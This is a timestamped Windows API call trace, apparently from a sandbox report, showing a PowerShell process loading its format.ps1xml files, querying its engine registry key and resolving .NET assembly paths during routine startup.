	[0092.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.365] SetErrorMode (uMode=0x1) returned 0x1
	[0092.365] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0092.366] GetFileType (hFile=0x334) returned 0x1
	[0092.366] SetErrorMode (uMode=0x1) returned 0x1
	[0092.366] GetFileType (hFile=0x334) returned 0x1
	[0092.366] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.417] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.417] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.417] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.418] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.418] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.418] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x9e2, lpOverlapped=0x0) returned 1
	[0092.418] ReadFile (in: hFile=0x334, lpBuffer=0x345c43a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345c43a*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.418] ReadFile (in: hFile=0x334, lpBuffer=0x345cef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x345cef0*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.418] CloseHandle (hObject=0x334) returned 1
	[0092.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.419] SetErrorMode (uMode=0x1) returned 0x1
	[0092.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0092.419] SetErrorMode (uMode=0x1) returned 0x1
	[0092.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.419] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0092.419] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0092.419] CoTaskMemAlloc (cb=0x5a) returned 0x25b610
	[0092.419] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x25b610, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0092.419] CoTaskMemFree (pv=0x25b610) 
	[0092.420] RegCloseKey (hKey=0x334) returned 0x0
	[0092.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.429] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3340a0d2, Data2=0x4f17, Data3=0x428d, Data4=([0]=0x9e, [1]=0xc3, [2]=0x86, [3]=0x4, [4]=0x26, [5]=0x34, [6]=0x2b, [7]=0x18))) returned 0x0
	[0092.440] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x6fbc9f7c, Data2=0x761b, Data3=0x44fd, Data4=([0]=0x97, [1]=0xdc, [2]=0x46, [3]=0xb1, [4]=0xc, [5]=0x4d, [6]=0xae, [7]=0x5))) returned 0x0
	[0092.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.443] SetErrorMode (uMode=0x1) returned 0x1
	[0092.444] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0092.444] GetFileType (hFile=0x334) returned 0x1
	[0092.444] SetErrorMode (uMode=0x1) returned 0x1
	[0092.444] GetFileType (hFile=0x334) returned 0x1
	[0092.444] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.445] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.446] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.447] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.447] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.448] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0xfb2, lpOverlapped=0x0) returned 1
	[0092.448] ReadFile (in: hFile=0x334, lpBuffer=0x3487172, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487172*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.448] ReadFile (in: hFile=0x334, lpBuffer=0x3487a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3487a58*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.448] CloseHandle (hObject=0x334) returned 1
	[0092.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.448] SetErrorMode (uMode=0x1) returned 0x1
	[0092.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0092.449] SetErrorMode (uMode=0x1) returned 0x1
	[0092.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.449] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0092.449] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0092.449] CoTaskMemAlloc (cb=0x5a) returned 0x25b680
	[0092.449] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x25b680, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0092.449] CoTaskMemFree (pv=0x25b680) 
	[0092.449] RegCloseKey (hKey=0x334) returned 0x0
	[0092.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0092.452] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2d7ceaa0, Data2=0xc45d, Data3=0x4649, Data4=([0]=0x99, [1]=0xee, [2]=0xd0, [3]=0xff, [4]=0x93, [5]=0x82, [6]=0xc2, [7]=0x16))) returned 0x0
	[0092.455] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x6f86a12d, Data2=0xe721, Data3=0x499c, Data4=([0]=0x89, [1]=0x82, [2]=0xe2, [3]=0xfd, [4]=0xe1, [5]=0x8c, [6]=0xee, [7]=0x78))) returned 0x0
	[0092.457] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x48f29702, Data2=0x9285, Data3=0x49dd, Data4=([0]=0xae, [1]=0x1d, [2]=0x55, [3]=0xd9, [4]=0x51, [5]=0x7d, [6]=0xfe, [7]=0xb2))) returned 0x0
	[0092.457] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xaad4bc21, Data2=0x5784, Data3=0x40ce, Data4=([0]=0x90, [1]=0x8d, [2]=0xa9, [3]=0xe6, [4]=0xf5, [5]=0xda, [6]=0x66, [7]=0xe8))) returned 0x0
	[0092.457] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x748f2f07, Data2=0xd102, Data3=0x450a, Data4=([0]=0x81, [1]=0xa9, [2]=0xff, [3]=0xdc, [4]=0x2e, [5]=0x28, [6]=0xe0, [7]=0xde))) returned 0x0
	[0092.458] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x879f3fa7, Data2=0x5670, Data3=0x4ff8, Data4=([0]=0x9b, [1]=0xf7, [2]=0x44, [3]=0x34, [4]=0xaa, [5]=0xe2, [6]=0x6f, [7]=0x28))) returned 0x0
	[0092.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.458] SetErrorMode (uMode=0x1) returned 0x1
	[0092.459] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0092.459] GetFileType (hFile=0x334) returned 0x1
	[0092.459] SetErrorMode (uMode=0x1) returned 0x1
	[0092.459] GetFileType (hFile=0x334) returned 0x1
	[0092.459] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.461] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.461] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.462] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.511] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.511] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0092.511] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0xaca, lpOverlapped=0x0) returned 1
	[0092.511] ReadFile (in: hFile=0x334, lpBuffer=0x34d2dea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d2dea*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.511] ReadFile (in: hFile=0x334, lpBuffer=0x34d37b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x34d37b8*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0092.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.512] SetErrorMode (uMode=0x1) returned 0x1
	[0092.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0092.513] SetErrorMode (uMode=0x1) returned 0x1
	[0092.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.513] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0092.513] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0092.513] CoTaskMemAlloc (cb=0x5a) returned 0x25b680
	[0092.513] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x25b680, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0092.513] CoTaskMemFree (pv=0x25b680) 
	[0092.513] RegCloseKey (hKey=0x334) returned 0x0
	[0092.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0092.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0092.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0092.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0092.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0092.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0092.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0092.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0092.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0092.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0092.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0092.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0092.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0092.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0092.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
